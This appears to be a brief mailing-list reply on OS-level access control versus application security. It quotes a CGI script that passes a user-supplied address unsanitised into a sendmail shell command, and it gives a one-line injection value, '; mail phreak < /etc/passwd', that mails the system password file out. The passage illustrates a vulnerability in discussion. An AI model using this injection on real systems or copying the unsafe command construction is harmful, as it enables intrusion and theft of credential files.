> True enough. The point is, you have to identify and exploit
> appropriate holes in both sendmail and in the nonbypassible access
> control mechanism of the OS. A properly designed mechanism is going to
> present a different kind of penetration problem.
The point is that if you have a class B O/S you're more likely to skimp
on the application level stuff. If you get both, that's great, but you
usually only get one.
I just found another:
sprintf(txt, "sendmail -f %s %s < %s",
user_provided_string, server_provided_string, tempname);
in a web server CGI script.
Just pop "; mail phreak < /etc/passwd" in as your address...